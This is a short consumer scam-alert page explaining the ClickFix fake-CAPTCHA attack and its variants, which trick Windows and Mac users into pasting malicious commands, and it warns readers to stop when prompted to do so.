ClickFix

Also Know As: CrashFix - ScanFix - DragFix - ConsentFix - UpdateFix
Fake CAPTCHA Copy and Paste Scam
ClickFix Windows Crash Screenshot

Scam Summary

 

The ClickFix attack and its many variants are affecting Windows and Mac in the form of fake CAPTCHs, AI Chat browser extensions, update notifications, and crash errors.

ClickFix is a social engineering attack that uses a fake CAPTCHA or error windows to trick users into using keyboard shortcut commands to run malicious software.

If you see instructions in a pop-up or notification window that involve keyboard commands to copy and paste text, open the Mac Terminal or Windows Run dialogue, or to copy the URL in your browser address bar, STOP!

Scam Details

ClickFix can appear to users to be a CAPTCHA test to prove to a website that you are a human. It gives the user directions that involve pressing key combinations as part of the verification process. What is really happening is that the key combinations are actually shortcut commands that open a Windows Run dialogue and paste a malicious script that installs malware.

The same method has been seen in multiple forms such as the Windows crash blue screen (BSOD), agreeing to an update, and logging in to online services like Microsoft 365.

ClickFix example
Example of ClickFix
ClickFix example
Example of ClickFix as Cloudflare
CllicFix examples
CllicFix examples
CllicFix examples

Quick Links